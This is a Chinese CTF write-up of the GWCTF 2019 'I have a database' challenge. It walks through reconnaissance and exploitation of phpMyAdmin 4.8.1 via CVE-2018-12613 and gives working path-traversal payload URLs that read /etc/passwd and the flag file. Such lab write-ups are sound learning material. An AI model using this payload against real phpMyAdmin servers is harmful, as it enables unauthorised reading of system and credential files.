[GWCTF 2019]我有一个数据库

发布时间 2023-03-30 21:39:11作者: zbclove

[GWCTF 2019]我有一个数据库

打开直接乱码,源码中也是乱码,而且还翻译不出来,但是可以在网络中刷新查看到原型

image-20230316222353499

直接上扫描

image-20230316222446915

打开robots.txt文件

image-20230316222512418

image-20230316222643038

phpinfo页面没有发现啥有用的信息

再打开phpmyadmin页面

image-20230319154901991

image-20230319155010559

这里显示了数据库的版本号、apache的版本号、php的版本号、phpmyadmin的版本号

直接在里面搜索数据啥也没有

image-20230319155231387

只能对给出的版本信息突破,找相关的cve进行注入

  • mysql 5.5.62 Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662)
  • Apache HTTPD 换行解析漏洞(CVE-2017-15715)
  • PHP远程代码执行漏洞复现(CVE-2019-11043)
  • phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613

每个都大致复现了一遍,最后只有phpmyadmin这个CVE有点希望

phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现_Senimo_的博客-CSDN博客

按照CVE的步骤

image-20230319164028729

构造payload

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

image-20230319164152900

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag

image-20230319164225457